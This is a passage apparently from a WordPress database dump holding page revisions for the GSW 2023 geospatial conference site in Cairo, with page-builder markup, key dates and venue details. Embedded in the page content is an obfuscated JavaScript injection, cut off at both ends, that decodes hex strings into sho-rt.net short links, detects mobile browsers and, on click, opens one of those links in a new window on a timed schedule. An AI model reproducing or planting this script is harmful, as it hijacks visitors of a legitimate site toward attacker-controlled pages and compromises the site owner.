_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 20:57:48','2022-11-09 20:57:48','',3066,'https://gsw2023.com/?p=3226',0,'revision','',0),
(3227,1,'2022-11-09 21:02:07','2022-11-09 21:02:07','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\r\n<h3></h3>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3220\" img_size=\"500x375\" alignment=\"center\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027721644{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]More[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 